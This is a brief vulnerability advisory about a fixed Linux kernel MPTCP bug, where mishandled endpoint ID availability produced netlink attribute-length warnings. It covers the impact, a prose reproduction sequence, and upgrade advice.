Linux Kernel MPTCP PM In-Kernel Endpoint ID Availability Vulnerability

A vulnerability in the Linux kernel's Multipath TCP (MPTCP) implementation has been addressed. The issue arose because the endpoint ID availability was not properly managed when MPTCP endpoints were removed and recreated, particularly in cases involving subflow flags. This mismanagement could lead to warnings about invalid attribute lengths in netlink messages, indicating a potential issue with how MPTCP endpoints were being handled. The vulnerability was identified by Syzkaller, a fuzzing tool that discovered the problem through a specific sequence of actions involving MPTCP endpoints and connections.

Impact

The vulnerability could cause netlink messages to be improperly formatted, with leftover bytes after parsing attributes, leading to potential issues in how MPTCP endpoint information is communicated and managed.

Reproduction

The vulnerability can be reproduced by creating an MPTCP endpoint for an address without any flags, then establishing a connection from that address. After removing the endpoint, the corresponding subflows will be deleted. Recreate the endpoint with the same ID, but this time include the subflow flag, and then add the fullmesh flag. This sequence will trigger the warning about the endpoint ID availability, demonstrating the vulnerability.

Remediation

The vulnerability has been fixed in the Linux kernel. Users should upgrade to the latest version where this issue has been addressed.